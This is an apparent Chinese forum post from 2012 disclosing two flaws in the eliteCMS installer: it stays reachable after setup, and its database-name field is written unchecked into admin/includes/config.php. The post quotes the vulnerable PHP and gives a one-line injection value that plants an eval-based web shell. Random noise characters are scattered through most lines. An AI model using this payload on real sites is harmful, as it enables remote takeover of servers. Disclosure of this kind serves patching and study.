eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装7 \/ o4 ?, U) M- t& F- X9 Q
( G7 M! Z0 }- Y5 }) g4 B
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php0 c+ x7 H1 ~0 f( H
我们来看代码:
6 a0 Q! f: N/ P' ? 6 i8 W; k$ f; I# z' n3 M- T2 w
...: C+ J7 w: ?4 p
elseif ($_GET['step'] == "4") {
6 |! R+ _7 `# ~ $file = "../admin/includes/config.php"; J" d4 w$ V' E" B' d3 P0 R) \. P2 r8 b
$write = "<?php\n";' y; I* s) Y5 _3 n+ @, J' K7 U" I
$write .= "/**\n";
9 J, w2 c5 G" A $write .= "*\n";
# F1 J: Z: x" s' r+ T0 G4 j $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";6 Z: o0 ]- Y( v$ A3 Y0 t
...略...
+ F3 j; c1 }2 A( y& ?+ P4 I! A $write .= "*\n";
0 D7 b8 r0 _; E $write .= "*/\n";5 [7 h! j8 H. S$ N2 Y6 T( {5 Q
$write .= "\n";* |5 X. x1 o. E6 R6 G: q: s! n
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
# Q) H8 X) q) ~' L' r- a $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
# K6 l1 h$ ?5 L8 K; l $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
: G& Y; o9 h$ O6 B% w $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
( c8 C N+ F! f) v; M $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";- t- W8 l6 N) K& I: G. \$ m
$write .= "if (!\$connection) {\n";
4 Q0 C- G1 l% w3 U: `& f $write .= " die(\"Database connection failed\" .mysql_error());\n";
' R: h7 p$ l1 O- q; B( A $write .= " \n";; `% k* |; k0 W
$write .= "} \n";% U" a j5 x1 ]) }- M
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";+ M, [& G, t" s' b1 S. _4 u* ^- s
$write .= "if (!\$db_select) {\n";
- E! M8 @+ U4 I6 i( R $write .= " die(\"Database select failed\" .mysql_error());\n";
- R$ N9 q9 m, k" x/ p2 A% X8 l0 ? $write .= " \n";
- C. U2 |0 @4 j% F& O2 D9 w" B! H $write .= "} \n";0 W5 V8 I0 h# y5 L/ L, E
$write .= "?>\n";/ X. D8 [3 S" \% ^9 K; }% s3 _) Z
1 E0 x; N) s0 c4 g, w- D0 H
$writer = fopen($file, 'w');
+ V" U4 B k+ E1 h" ` }" g...4 I5 d- y2 P0 d2 `8 s0 h
/ Y O7 H" u1 Y1 W在看代码:
B8 D! l8 @$ s3 C
! t1 p) d4 J( j( {$ a0 v9 k$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
2 p: A. S4 d; k% \( J$_SESSION['DB_NAME'] = $_POST['DB_NAME'];: m$ q1 L; A) [7 ]
$_SESSION['DB_USER'] = $_POST['DB_USER'];; O# b. L# m) [
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
% a* ~$ G2 z. l- q7 M4 C % O& f; j5 c- I& }" S
取值未作任何验证; B! ~& H' n' z# L- j0 [
如果将数据库名POST数据:& D3 n; H0 h8 [0 K7 S( [4 [
- U- g6 _% P# {) d& g% `
"?><?php eval($_POST[c]);?><?php( Q. t$ _$ E6 W: ?! T/ u
5 X( G3 q& c7 |$ p( P/ z6 W将导致一句话后门写入/admin/includes/config.php- W. {3 l, t0 k# L. H
|
发表于 2012-11-18 13:59:27
收藏
支持
反对